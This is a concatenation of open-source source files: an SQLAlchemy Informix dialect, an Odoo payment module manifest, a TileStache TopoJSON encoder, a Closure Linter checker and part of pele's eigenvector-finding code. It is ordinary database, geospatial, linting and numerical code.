        return "DATETIME YEAR TO SECOND"

    def visit_large_binary(self, type_):
        return "BYTE"

    def visit_boolean(self, type_):
        # booleans are stored as SMALLINT by this dialect
        return "SMALLINT"
class InfoSQLCompiler(compiler.SQLCompiler):
    """Statement compiler producing Informix SQL syntax."""

    def default_from(self):
        # Informix has no FROM-less SELECT; select from a catalog table
        return " from systables where tabname = 'systables' "

    def get_select_precolumns(self, select):
        # Informix puts SKIP/FIRST (offset/limit) before the column list
        s = ""
        if select._offset:
            s += "SKIP %s " % select._offset
        if select._limit:
            s += "FIRST %s " % select._limit
        s += select._distinct and "DISTINCT " or ""
        return s

    def visit_select(self, select, asfrom=False, parens=True, **kw):
        text = compiler.SQLCompiler.visit_select(self, select, asfrom, parens, **kw)
        if asfrom and parens and self.dialect.server_version_info < (11,):
            # pre-11 servers need derived tables wrapped in table(multiset(...))
            # (assuming that version 11 doesn't need this; not tested)
            return "table(multiset" + text + ")"
        else:
            return text

    def limit_clause(self, select):
        # limit/offset are emitted by get_select_precolumns() instead
        return ""

    def visit_function(self, func, **kw):
        # map ANSI niladic functions onto their Informix spellings
        if func.name.lower() == 'current_date':
            return "today"
        elif func.name.lower() == 'current_time':
            return "CURRENT HOUR TO SECOND"
        elif func.name.lower() in ('current_timestamp', 'now'):
            return "CURRENT YEAR TO SECOND"
        else:
            return compiler.SQLCompiler.visit_function(self, func, **kw)

    def visit_mod(self, binary, **kw):
        # Informix has no infix modulo operator; use the MOD() function
        return "MOD(%s, %s)" % (self.process(binary.left), self.process(binary.right))
class InfoDDLCompiler(compiler.DDLCompiler):
    """DDL compiler handling Informix's non-standard constraint syntax.

    Informix expects the ``CONSTRAINT <name>`` clause *after* the
    constraint definition - the reverse of the SQL-standard order - so
    the visit_*_constraint methods below are adapted copies of the
    generic implementations in sql/compiler.py.
    """

    def visit_add_constraint(self, create):
        preparer = self.preparer
        return "ALTER TABLE %s ADD CONSTRAINT %s" % (
            self.preparer.format_table(create.element.table),
            self.process(create.element)
        )

    def get_column_specification(self, column, **kw):
        """Render one column clause of a CREATE TABLE statement.

        The first autoincrementing, non-foreign-key integer primary-key
        column is rendered as SERIAL instead of its declared type.
        """
        colspec = self.preparer.format_column(column)
        first = None
        if column.primary_key and column.autoincrement:
            try:
                first = [c for c in column.table.primary_key.columns
                         if (c.autoincrement and
                             isinstance(c.type, sqltypes.Integer) and
                             not c.foreign_keys)].pop(0)
            except IndexError:
                pass
        if column is first:
            colspec += " SERIAL"
        else:
            colspec += " " + self.dialect.type_compiler.process(column.type)
            default = self.get_column_default_string(column)
            if default is not None:
                colspec += " DEFAULT " + default
        if not column.nullable:
            colspec += " NOT NULL"
        return colspec

    def get_column_default_string(self, column):
        """Return the server default, rendering string defaults on numeric
        columns as literal SQL text rather than quoted strings."""
        if (isinstance(column.server_default, schema.DefaultClause) and
                isinstance(column.server_default.arg, basestring)):
            if isinstance(column.type, (sqltypes.Integer, sqltypes.Numeric)):
                return self.sql_compiler.process(text(column.server_default.arg))
        return super(InfoDDLCompiler, self).get_column_default_string(column)

    ### Informix wants the constraint name at the end, hence this is c&p from sql/compiler.py
    def visit_primary_key_constraint(self, constraint):
        if len(constraint) == 0:
            return ''
        text = "PRIMARY KEY "
        text += "(%s)" % ', '.join(self.preparer.quote(c.name, c.quote)
                                   for c in constraint)
        text += self.define_constraint_deferrability(constraint)
        if constraint.name is not None:
            text += " CONSTRAINT %s" % self.preparer.format_constraint(constraint)
        return text

    def visit_foreign_key_constraint(self, constraint):
        preparer = self.dialect.identifier_preparer
        remote_table = list(constraint._elements.values())[0].column.table
        text = "FOREIGN KEY (%s) REFERENCES %s (%s)" % (
            ', '.join(preparer.quote(f.parent.name, f.parent.quote)
                      for f in constraint._elements.values()),
            preparer.format_table(remote_table),
            ', '.join(preparer.quote(f.column.name, f.column.quote)
                      for f in constraint._elements.values())
        )
        text += self.define_constraint_cascades(constraint)
        text += self.define_constraint_deferrability(constraint)
        if constraint.name is not None:
            text += " CONSTRAINT %s " % \
                preparer.format_constraint(constraint)
        return text

    def visit_unique_constraint(self, constraint):
        text = "UNIQUE (%s)" % (', '.join(self.preparer.quote(c.name, c.quote) for c in constraint))
        text += self.define_constraint_deferrability(constraint)
        if constraint.name is not None:
            # bug fix: the leading space was missing here, producing
            # invalid SQL such as "UNIQUE (col)CONSTRAINT name".
            text += " CONSTRAINT %s " % self.preparer.format_constraint(constraint)
        return text
class InformixIdentifierPreparer(compiler.IdentifierPreparer):
    # Quote identifiers that collide with Informix reserved words
    # (RESERVED_WORDS is defined at module level).
    reserved_words = RESERVED_WORDS
class InformixDialect(default.DefaultDialect):
    """SQLAlchemy dialect for the Informix database.

    Schema reflection reads the Informix system catalog (systables,
    syscolumns, sysindexes, sysconstraints, sysreferences, sysdefaults,
    sysviews).  Index column positions are stored in the sysindexes
    columns part1 .. part16.
    """
    name = 'informix'

    max_identifier_length = 128  # adjusts at runtime based on server version

    type_compiler = InfoTypeCompiler
    statement_compiler = InfoSQLCompiler
    ddl_compiler = InfoDDLCompiler
    colspecs = colspecs
    ischema_names = ischema_names
    preparer = InformixIdentifierPreparer
    default_paramstyle = 'qmark'

    def __init__(self, has_transactions=True, *args, **kwargs):
        # has_transactions=False accommodates databases created without
        # logging, where COMMIT/ROLLBACK are unavailable.
        self.has_transactions = has_transactions
        default.DefaultDialect.__init__(self, *args, **kwargs)

    def initialize(self, connection):
        super(InformixDialect, self).initialize(connection)

        # http://www.querix.com/support/knowledge-base/error_number_message/error_200
        if self.server_version_info < (9, 2):
            self.max_identifier_length = 18
        else:
            self.max_identifier_length = 128

    def do_begin(self, connection):
        cu = connection.cursor()
        cu.execute('SET LOCK MODE TO WAIT')
        if self.has_transactions:
            cu.execute('SET ISOLATION TO REPEATABLE READ')

    def do_commit(self, connection):
        if self.has_transactions:
            connection.commit()

    def do_rollback(self, connection):
        if self.has_transactions:
            connection.rollback()

    def _get_table_names(self, connection, connection_schema_unused=None, **kw):
        raise NotImplementedError  # placeholder; real definition below

    def _get_table_names(self, connection, schema, type, **kw):
        """Shared implementation for table ('T') and view ('V') listings."""
        schema = schema or self.default_schema_name
        s = "select tabname, owner from systables where owner=? and tabtype=?"
        return [row[0] for row in connection.execute(s, schema, type)]

    @reflection.cache
    def get_table_names(self, connection, schema=None, **kw):
        return self._get_table_names(connection, schema, 'T', **kw)

    @reflection.cache
    def get_view_names(self, connection, schema=None, **kw):
        return self._get_table_names(connection, schema, 'V', **kw)

    @reflection.cache
    def get_schema_names(self, connection, **kw):
        s = "select owner from systables"
        return [row[0] for row in connection.execute(s)]

    def has_table(self, connection, table_name, schema=None):
        schema = schema or self.default_schema_name
        cursor = connection.execute(
            """select tabname from systables where tabname=? and owner=?""",
            table_name, schema)
        return cursor.first() is not None

    @reflection.cache
    def get_columns(self, connection, table_name, schema=None, **kw):
        """Reflect column name/type/nullability/default information."""
        schema = schema or self.default_schema_name
        c = connection.execute(
            """select colname, coltype, collength, t3.default, t1.colno from
                syscolumns as t1 , systables as t2 , OUTER sysdefaults as t3
                where t1.tabid = t2.tabid and t2.tabname=? and t2.owner=?
                  and t3.tabid = t2.tabid and t3.colno = t1.colno
                order by t1.colno""", table_name, schema)

        primary_cols = self.get_primary_keys(connection, table_name, schema, **kw)

        columns = []
        rows = c.fetchall()
        for name, colattr, collength, default, colno in rows:
            name = name.lower()

            autoincrement = False
            primary_key = False

            if name in primary_cols:
                primary_key = True

            # in 7.31, coltype = 0x000
            #                       ^^-- column type
            #                      ^-- 1 not null, 0 null
            not_nullable, coltype = divmod(colattr, 256)

            if coltype not in (0, 13) and default:
                default = default.split()[-1]

            if coltype == 6:  # Serial, mark as autoincrement
                autoincrement = True

            if coltype == 0 or coltype == 13:  # char, varchar
                coltype = ischema_names[coltype](collength)
                if default:
                    default = "'%s'" % default
            elif coltype == 5:  # decimal
                # precision and scale are packed into the two bytes of
                # collength; 255 means "no scale specified".
                precision, scale = (collength & 0xFF00) >> 8, collength & 0xFF
                if scale == 255:
                    scale = 0
                coltype = sqltypes.Numeric(precision, scale)
            else:
                try:
                    coltype = ischema_names[coltype]
                except KeyError:
                    util.warn("Did not recognize type '%s' of column '%s'" %
                              (coltype, name))
                    coltype = sqltypes.NULLTYPE

            column_info = dict(name=name, type=coltype, nullable=not not_nullable,
                               default=default, autoincrement=autoincrement,
                               primary_key=primary_key)
            columns.append(column_info)
        return columns

    @reflection.cache
    def get_foreign_keys(self, connection, table_name, schema=None, **kw):
        """Reflect foreign key constraints.

        Index column positions live in sysindexes.part1 .. part16.
        Bug fix: the part lists previously repeated part11 and used
        part4 where part14 belonged, so FK columns stored in those index
        slots were missed.
        """
        schema_sel = schema or self.default_schema_name
        c = connection.execute(
            """select t1.constrname as cons_name,
                 t4.colname as local_column, t7.tabname as remote_table,
                 t6.colname as remote_column, t7.owner as remote_owner
                from sysconstraints as t1 , systables as t2 ,
                     sysindexes as t3 , syscolumns as t4 ,
                     sysreferences as t5 , syscolumns as t6 , systables as t7 ,
                     sysconstraints as t8 , sysindexes as t9
               where t1.tabid = t2.tabid and t2.tabname=? and t2.owner=? and t1.constrtype = 'R'
                 and t3.tabid = t2.tabid and t3.idxname = t1.idxname
                 and t4.tabid = t2.tabid and t4.colno in (t3.part1, t3.part2, t3.part3,
                     t3.part4, t3.part5, t3.part6, t3.part7, t3.part8, t3.part9, t3.part10,
                     t3.part11, t3.part12, t3.part13, t3.part14, t3.part15, t3.part16)
                 and t5.constrid = t1.constrid and t8.constrid = t5.primary
                 and t6.tabid = t5.ptabid and t6.colno in (t9.part1, t9.part2, t9.part3,
                     t9.part4, t9.part5, t9.part6, t9.part7, t9.part8, t9.part9, t9.part10,
                     t9.part11, t9.part12, t9.part13, t9.part14, t9.part15, t9.part16)
                 and t9.idxname = t8.idxname
                 and t7.tabid = t5.ptabid""", table_name, schema_sel)

        def fkey_rec():
            # one record per constraint name, filled in across rows
            return {
                'name': None,
                'constrained_columns': [],
                'referred_schema': None,
                'referred_table': None,
                'referred_columns': []
            }

        fkeys = util.defaultdict(fkey_rec)

        rows = c.fetchall()
        for cons_name, local_column, \
                remote_table, remote_column, remote_owner in rows:

            rec = fkeys[cons_name]
            rec['name'] = cons_name
            local_cols, remote_cols = \
                rec['constrained_columns'], rec['referred_columns']

            if not rec['referred_table']:
                rec['referred_table'] = remote_table
                if schema is not None:
                    rec['referred_schema'] = remote_owner

            if local_column not in local_cols:
                local_cols.append(local_column)
            if remote_column not in remote_cols:
                remote_cols.append(remote_column)

        return fkeys.values()

    @reflection.cache
    def get_primary_keys(self, connection, table_name, schema=None, **kw):
        """Return the list of primary key column names."""
        schema = schema or self.default_schema_name

        # Select the column positions from sysindexes for sysconstraints
        data = connection.execute(
            """select t2.*
            from systables as t1, sysindexes as t2, sysconstraints as t3
            where t1.tabid=t2.tabid and t1.tabname=? and t1.owner=?
            and t2.idxname=t3.idxname and t3.constrtype='P'""",
            table_name, schema
        ).fetchall()

        colpositions = set()

        for row in data:
            # part1 .. part16 hold the index's column numbers (0 = unused).
            # range(1, 17) so part16 is included; range(1, 16) silently
            # dropped the 16th key column.
            colpos = set([getattr(row, 'part%d' % x) for x in range(1, 17)])
            colpositions |= colpos

        if not len(colpositions):
            return []

        # Select the column names using the columnpositions
        # TODO: Maybe cache a bit of those col infos (eg select all colnames for one table)
        place_holder = ','.join('?' * len(colpositions))

        c = connection.execute(
            """select t1.colname
            from syscolumns as t1, systables as t2
            where t2.tabname=? and t1.tabid = t2.tabid and
            t1.colno in (%s)""" % place_holder,
            table_name, *colpositions
        ).fetchall()

        return reduce(lambda x, y: list(x) + list(y), c, [])

    @reflection.cache
    def get_indexes(self, connection, table_name, schema, **kw):
        """Reflect the indexes defined on table_name."""
        # TODO: schema...
        c = connection.execute(
            """select t1.*
            from sysindexes as t1 , systables as t2
            where t1.tabid = t2.tabid and t2.tabname=?""",
            table_name)

        indexes = []
        for row in c.fetchall():
            # range(1, 17) so part16 is included (was range(1, 16)).
            colnames = [getattr(row, 'part%d' % x) for x in range(1, 17)]
            colnames = [x for x in colnames if x]
            place_holder = ','.join('?' * len(colnames))

            col_rows = connection.execute(
                """select t1.colname
                from syscolumns as t1, systables as t2
                where t2.tabname=? and t1.tabid = t2.tabid and
                t1.colno in (%s)""" % place_holder,
                table_name, *colnames
            ).fetchall()
            names = reduce(lambda x, y: list(x) + list(y), col_rows, [])

            indexes.append({
                'name': row.idxname,
                'unique': row.idxtype.lower() == 'u',
                'column_names': names
            })
        return indexes

    @reflection.cache
    def get_view_definition(self, connection, view_name, schema=None, **kw):
        """Return the view source text, reassembled from its seqno chunks."""
        schema = schema or self.default_schema_name
        c = connection.execute(
            """select t1.viewtext
            from sysviews as t1 , systables as t2
            where t1.tabid=t2.tabid and t2.tabname=?
            and t2.owner=? order by seqno""",
            view_name, schema).fetchall()

        return ''.join([row[0] for row in c])

    def _get_default_schema_name(self, connection):
        return connection.execute('select CURRENT_ROLE from systables').scalar()
| bsd-3-clause |
gorjuce/odoo | addons/account_payment/__openerp__.py | 261 | 2925 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Suppliers Payment Management',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Accounting & Finance',
'description': """
Module to manage the payment of your supplier invoices.
=======================================================
This module allows you to create and manage your payment orders, with purposes to
---------------------------------------------------------------------------------
* serve as base for an easy plug-in of various automated payment mechanisms.
* provide a more efficient way to manage invoice payment.
Warning:
~~~~~~~~
The confirmation of a payment order does _not_ create accounting entries, it just
records the fact that you gave your payment order to your bank. The booking of
your order must be encoded as usual through a bank statement. Indeed, it's only
when you get the confirmation from your bank that your order has been accepted
that you can book it in your accounting. To help you with that operation, you
have a new option to import payment orders as bank statement lines.
""",
'depends': ['account','account_voucher'],
'data': [
'security/account_payment_security.xml',
'security/ir.model.access.csv',
'wizard/account_payment_pay_view.xml',
'wizard/account_payment_populate_statement_view.xml',
'wizard/account_payment_create_order_view.xml',
'account_payment_view.xml',
'account_payment_workflow.xml',
'account_payment_sequence.xml',
'account_payment_report.xml',
'views/report_paymentorder.xml',
],
'demo': ['account_payment_demo.xml'],
'test': [
'test/account_payment_demo.yml',
'test/cancel_payment_order.yml',
'test/payment_order_process.yml',
'test/account_payment_report.yml',
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mdiener21/python-geospatial-analysis-cookbook | ch10/TileStache-master/TileStache/Goodies/VecTiles/topojson.py | 6 | 8186 | from shapely.wkb import loads
import json
from ... import getTile
from ...Core import KnownUnknown
def get_tiles(names, config, coord):
    ''' Load the named TopoJSON layer tiles out of a TileStache config.

        Validates each response: every layer must exist, every mime-type
        must be JSON, every payload must have type "Topology", and all
        tiles must share one affine transform (otherwise their arcs
        cannot be merged).
    '''
    unknown_layers = set(names) - set(config.layers.keys())
    if unknown_layers:
        raise KnownUnknown("%s.get_tiles didn't recognize %s when trying to load %s." % (__name__, ', '.join(unknown_layers), ', '.join(names)))

    responses = [getTile(config.layers[name], coord, 'topojson') for name in names]
    mimes, bodies = zip(*responses)

    for (name, mime) in zip(names, mimes):
        if not mime.endswith('/json'):
            raise KnownUnknown('%s.get_tiles encountered a non-JSON mime-type in %s sub-layer: "%s"' % (__name__, name, mime))

    topojsons = [json.loads(body) for body in bodies]

    for (name, topo) in zip(names, topojsons):
        if topo['type'] != 'Topology':
            raise KnownUnknown('%s.get_tiles encountered a non-Topology type in %s sub-layer: "%s"' % (__name__, name, topo['type']))

    unique_xforms = set(tuple(topo['transform']['scale'] + topo['transform']['translate'])
                        for topo in topojsons)
    if len(unique_xforms) > 1:
        raise KnownUnknown('%s.get_tiles encountered incompatible transforms: %s' % (__name__, list(unique_xforms)))

    return topojsons
def update_arc_indexes(geometry, merged_arcs, old_arcs):
    ''' Renumber the arc indexes in a geometry to point into merged_arcs.

        Every arc the geometry references is copied from old_arcs onto the
        end of merged_arcs, and the geometry is rewritten to use the new
        index.  geometry and merged_arcs are modified in-place; returns None.
    '''
    def relocate(arc_list):
        # Rewrite one flat list of arc indexes, moving arcs as we go.
        for (position, old_index) in enumerate(arc_list):
            arc_list[position] = len(merged_arcs)
            merged_arcs.append(old_arcs[old_index])

    kind = geometry['type']

    if kind in ('Point', 'MultiPoint'):
        # Point geometries carry coordinates, not arcs - nothing to do.
        return

    elif kind == 'LineString':
        relocate(geometry['arcs'])

    elif kind in ('Polygon', 'MultiLineString'):
        # Both types store a list of flat arc-index lists.
        for arc_list in geometry['arcs']:
            relocate(arc_list)

    elif kind == 'MultiPolygon':
        for polygon in geometry['arcs']:
            for ring in polygon:
                relocate(ring)

    else:
        raise NotImplementedError("Can't do %s geometries" % kind)
def get_transform(bounds, size=1024):
    ''' Build a TopoJSON "transform" dict plus a forward projection function.

        size is the tile edge length in pixels, which fixes the integer
        resolution of the quantized output space.
    '''
    translate_x, translate_y = bounds[0], bounds[1]
    scale_x = (bounds[2] - bounds[0]) / size
    scale_y = (bounds[3] - bounds[1]) / size

    def forward(lon, lat):
        ''' Quantize one lon/lat pair to TopoJSON integer space. '''
        x = int(round((lon - translate_x) / scale_x))
        y = int(round((lat - translate_y) / scale_y))
        return x, y

    transform = dict(translate=(translate_x, translate_y),
                     scale=(scale_x, scale_y))
    return transform, forward
def diff_encode(line, transform):
    ''' Differentially encode a shapely linestring or ring.

        The first point is kept absolute; each later entry is the delta
        from the previous quantized point, with zero-length deltas dropped.
    '''
    points = [transform(x, y) for (x, y) in line.coords]

    encoded = points[:1]
    for ((x1, y1), (x2, y2)) in zip(points, points[1:]):
        dx, dy = x2 - x1, y2 - y1
        if (dx, dy) != (0, 0):
            encoded.append((dx, dy))

    return encoded
def decode(file):
    ''' Stub function to decode a TopoJSON file into a list of features.
        Not currently implemented, modeled on geojson.decode().
    '''
    # TODO: implement by inverting encode() - expand the diff-encoded arcs
    # and apply the "transform" scale/translate to recover coordinates.
    raise NotImplementedError('topojson.decode() not yet written')
def encode(file, features, bounds, is_clipped):
    ''' Encode a list of (WKB, property dict) features into a TopoJSON stream.

        Also accept three-element tuples as features: (WKB, property dict, id).

        Geometries in the features list are assumed to be unprojected lon, lats.
        Bounds are given in geographic coordinates as (xmin, ymin, xmax, ymax).
    '''
    transform, forward = get_transform(bounds)
    geometries, arcs = list(), list()

    for feature in features:
        shape = loads(feature[0])
        geometry = dict(properties=feature[1])
        geometries.append(geometry)

        if is_clipped:
            geometry.update(dict(clipped=True))

        if len(feature) >= 3:
            # ID is an optional third element in the feature tuple.
            # Bug fix: this used to test "len(feature) >= 2", which raised
            # IndexError for the documented two-element (WKB, props) form.
            geometry.update(dict(id=feature[2]))

        if shape.type == 'GeometryCollection':
            # Nothing meaningful to encode; drop the placeholder geometry.
            geometries.pop()
            continue

        elif shape.type == 'Point':
            geometry.update(dict(type='Point', coordinates=forward(shape.x, shape.y)))

        elif shape.type == 'LineString':
            geometry.update(dict(type='LineString', arcs=[len(arcs)]))
            arcs.append(diff_encode(shape, forward))

        elif shape.type == 'Polygon':
            geometry.update(dict(type='Polygon', arcs=[]))

            rings = [shape.exterior] + list(shape.interiors)

            for ring in rings:
                geometry['arcs'].append([len(arcs)])
                arcs.append(diff_encode(ring, forward))

        elif shape.type == 'MultiPoint':
            geometry.update(dict(type='MultiPoint', coordinates=[]))

            for point in shape.geoms:
                geometry['coordinates'].append(forward(point.x, point.y))

        elif shape.type == 'MultiLineString':
            geometry.update(dict(type='MultiLineString', arcs=[]))

            for line in shape.geoms:
                geometry['arcs'].append([len(arcs)])
                arcs.append(diff_encode(line, forward))

        elif shape.type == 'MultiPolygon':
            geometry.update(dict(type='MultiPolygon', arcs=[]))

            for polygon in shape.geoms:
                rings = [polygon.exterior] + list(polygon.interiors)
                polygon_arcs = []

                for ring in rings:
                    polygon_arcs.append([len(arcs)])
                    arcs.append(diff_encode(ring, forward))

                geometry['arcs'].append(polygon_arcs)

        else:
            raise NotImplementedError("Can't do %s geometries" % shape.type)

    result = {
        'type': 'Topology',
        'transform': transform,
        'objects': {
            'vectile': {
                'type': 'GeometryCollection',
                'geometries': geometries
            }
        },
        'arcs': arcs
    }

    json.dump(result, file, separators=(',', ':'))
def merge(file, names, config, coord):
    ''' Retrieve a list of TopoJSON tile responses and write their union to file.

        get_tiles() retrieves the data and performs basic integrity checks.
    '''
    inputs = get_tiles(names, config, coord)

    output = {
        'type': 'Topology',
        'transform': inputs[0]['transform'],
        'objects': dict(),
        'arcs': list()
    }

    for (name, topology) in zip(names, inputs):
        multiple_objects = len(topology['objects']) > 1

        for (index, obj) in enumerate(topology['objects'].values()):
            # Disambiguate the key only when one tile carries several objects.
            if multiple_objects:
                output['objects']['%s-%d' % (name, index)] = obj
            else:
                output['objects'][name] = obj

            # Re-point each geometry at the merged arc list.
            for geometry in obj['geometries']:
                update_arc_indexes(geometry, output['arcs'], topology['arcs'])

    json.dump(output, file, separators=(',', ':'))
| mit |
byterom/android_external_chromium_org | third_party/closure_linter/closure_linter/checker.py | 109 | 3892 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core methods for checking JS files for common style guide violations."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)')
import gflags as flags
from closure_linter import aliaspass
from closure_linter import checkerbase
from closure_linter import closurizednamespacesinfo
from closure_linter import javascriptlintrules
# Command-line flags consumed by JavaScriptStyleChecker below.
# NOTE(review): the first help string is missing a space between
# "of" and "goog.provide", and the second reads "should be not be" -
# both are user-visible --help text; left unchanged here.
flags.DEFINE_list('closurized_namespaces', '',
                  'Namespace prefixes, used for testing of'
                  'goog.provide/require')
flags.DEFINE_list('ignored_extra_namespaces', '',
                  'Fully qualified namespaces that should be not be reported '
                  'as extra by the linter.')
class JavaScriptStyleChecker(checkerbase.CheckerBase):
  """Checker that applies JavaScriptLintRules."""

  def __init__(self, state_tracker, error_handler):
    """Initializes a JavaScriptStyleChecker object.

    Args:
      state_tracker: State tracker.
      error_handler: Error handler to pass all errors to.
    """
    namespaces_info = None
    alias_pass = None

    closurized_namespaces = flags.FLAGS.closurized_namespaces
    if closurized_namespaces:
      # Namespace tracking and alias resolution only make sense when the
      # user declared which namespace prefixes are closurized.
      namespaces_info = closurizednamespacesinfo.ClosurizedNamespacesInfo(
          closurized_namespaces,
          flags.FLAGS.ignored_extra_namespaces)
      alias_pass = aliaspass.AliasPass(closurized_namespaces, error_handler)

    self._namespaces_info = namespaces_info
    self._alias_pass = alias_pass

    checkerbase.CheckerBase.__init__(
        self,
        error_handler=error_handler,
        lint_rules=javascriptlintrules.JavaScriptLintRules(namespaces_info),
        state_tracker=state_tracker)

  def Check(self, start_token, limited_doc_checks=False, is_html=False,
            stop_token=None):
    """Checks a token stream for lint warnings/errors.

    Adds a separate pass for computing dependency information based on
    goog.require and goog.provide statements prior to the main linting pass.

    Args:
      start_token: The first token in the token stream.
      limited_doc_checks: Whether to perform limited checks.
      is_html: Whether this token stream is HTML.
      stop_token: If given, checks should stop at this token.
    """
    self._lint_rules.Initialize(self, limited_doc_checks, is_html)

    if self._alias_pass:
      self._alias_pass.Process(start_token)

    # Running the dependency pass only when namespace info exists maximizes
    # the number of errors reported before any parse error is displayed.
    if self._namespaces_info:
      self._namespaces_info.Reset()
      self._ExecutePass(start_token, self._DependencyPass, stop_token)

    self._ExecutePass(start_token, self._LintPass, stop_token)

    # A stop_token means the whole file wasn't read, so the end-of-file
    # checks performed by Finalize must be skipped.
    if not stop_token:
      self._lint_rules.Finalize(self._state_tracker)

  def _DependencyPass(self, token):
    """Processes an individual token for dependency information.

    Used to encapsulate the logic needed to process an individual token so
    that it can be passed to _ExecutePass.

    Args:
      token: The token to process.
    """
    self._namespaces_info.ProcessToken(token, self._state_tracker)
| bsd-3-clause |
khs26/pele | pele/transition_states/_find_lowest_eig.py | 5 | 16110 | """tools for finding the smallest eigenvalue and associated eigenvector
using Rayleigh-Ritz minimization
"""
import numpy as np
import logging
from pele.transition_states import orthogopt
from pele.potentials.potential import BasePotential
from pele.optimize import MYLBFGS
import pele.utils.rotations as rotations
__all__ = ["findLowestEigenVector", "analyticalLowestEigenvalue", "FindLowestEigenVector"]
class LowestEigPot(BasePotential):
    """Potential wrapper for use in an optimizer for finding the eigenvector
    Notes
    -----
    here the energy corresponds to the eigenvalue, and the coordinates to be
    optimized is the eigenvector
    Parameters
    -----------
    coords : array
        The point in space where we want to compute the lowest eigenvector
    pot : potential object
        The potential of the system. i.e. pot.getEnergyGradient(coords)
        gives the energy and gradient
    orthogZeroEigs : callable
        The function which makes a vector orthogonal to the known
        eigenvectors with zero eigenvalues. The default assumes global
        translational and rotational symmetry
    dx : float
        the local curvature is approximated using points separated by dx
    first_order : bool
        use the first order forward finite differences approximation for
        the curvature rather than the second order central differences
        approximation. This is less accurate, but requires one fewer
        potential call per iteration.
    gradient : float array
        the true gradient at coords. If first_order is true and gradient
        is not None then one potential call will be saved.
    verbosity : int
        diagnostic messages are printed when greater than 1
    """
    def __init__(self, coords, pot, orthogZeroEigs=0, dx=1e-6,
                 first_order=True, gradient=None, verbosity=1):
        self.pot = pot
        self.first_order = first_order
        self.nfev = 0  # number of calls made to the true potential
        self.verbosity = verbosity
        self.update_coords(coords, gradient=gradient)
        # orthogZeroEigs == 0 selects the default projector (orthogopt);
        # passing None disables the projection entirely.
        if orthogZeroEigs == 0:
            self.orthogZeroEigs = orthogopt
        else:
            self.orthogZeroEigs = orthogZeroEigs
        self.diff = dx
    def _get_true_energy_gradient(self, coords):
        """return the true energy and gradient at coords"""
        # every call to the wrapped potential is counted in nfev
        self.nfev += 1
        return self.pot.getEnergyGradient(coords)
    def update_coords(self, coords, gradient=None):
        """update the position at which the curvature is computed
        If first_order is set, the true gradient at the new position is
        cached here; a supplied gradient saves one potential call.
        """
        self.coords = coords.copy()
        if self.first_order:
            if gradient is not None:
                # self.true_energy = energy
                self.true_gradient = gradient.copy()
            else:
                if self.verbosity > 1:
                    print "possibly computing gradient unnecessarily"
                true_energy, self.true_gradient = self._get_true_energy_gradient(self.coords)
    def getEnergy(self, vec_in):
        """return the 'energy' a.k.a. the curvature at coords along the direction vec_in"""
        if self.orthogZeroEigs is not None:
            # project out the known zero modes before normalizing
            vec_in /= np.linalg.norm(vec_in)
            vec_in = self.orthogZeroEigs(vec_in, self.coords)
        vec = vec_in / np.linalg.norm(vec_in)
        coordsnew = self.coords + self.diff * vec
        Eplus, Gplus = self._get_true_energy_gradient(coordsnew)
        if self.first_order:
            # forward difference: (g(x + h*v) - g(x)) . v / h
            curvature = np.dot((Gplus - self.true_gradient), vec) / self.diff
        else:
            # central difference: (g(x + h*v) - g(x - h*v)) . v / (2*h)
            coordsnew = self.coords - self.diff * vec
            Eminus, Gminus = self._get_true_energy_gradient(coordsnew)
            curvature = np.dot((Gplus - Gminus), vec) / (2.0 * self.diff)
        return curvature
    def getEnergyGradient(self, vec_in):
        """return the curvature and the gradient of the curvature w.r.t. vec_in
        Parameters
        ----------
        vec_in : array
            A guess for the lowest eigenvector. It should be normalized
        """
        vecl = 1.
        if self.orthogZeroEigs is not None:
            # project out the known zero modes before normalizing
            vec_in /= np.linalg.norm(vec_in)
            vec_in = self.orthogZeroEigs(vec_in, self.coords)
        vec = vec_in / np.linalg.norm(vec_in)
        coordsnew = self.coords + self.diff * vec
        Eplus, Gplus = self._get_true_energy_gradient(coordsnew)
        if self.first_order:
            # forward difference: (g(x + h*v) - g(x)) . v / h
            curvature = np.dot((Gplus - self.true_gradient), vec) / self.diff
        else:
            coordsnew = self.coords - self.diff * vec
            Eminus, Gminus = self._get_true_energy_gradient(coordsnew)
            # use second order central difference method.
            curvature = np.dot((Gplus - Gminus), vec) / (2.0 * self.diff)
        # higher order central differences would be more accurate but it cannot be differentiated analytically
        # DIAG = (EPLUS + EMINUS - 2. * ENERGY) / (self.diff)
        # DIAG3=2*(DIAG-DIAG2/2)
        # C Although DIAG3 is a more accurate estimate of the diagonal second derivative, it
        # C cannot be differentiated analytically.
        # compute the analytical derivative of the curvature with respect to vec
        # GL(J1)=(GRAD1(J1)-GRAD2(J1))/(ZETA*VECL**2)-2.0D0*DIAG2*LOCALV(J1)/VECL**2
        if self.first_order:
            grad = (Gplus - self.true_gradient) * 2.0 / self.diff - 2. * curvature * vec
        else:
            grad = (Gplus - Gminus) / (self.diff * vecl ** 2) - 2.0 * curvature * vec / vecl ** 2
        if self.orthogZeroEigs is not None:
            grad = self.orthogZeroEigs(grad, self.coords)
        # Project out any component of the gradient along vec (which is a unit vector)
        # This is a big improvement for DFTB.
        # js850> grad should already be perpendicular to vec. this helps with any numerical errors
        grad -= np.dot(grad, vec) * vec
        return curvature, grad
class FindLowestEigenVector(object):
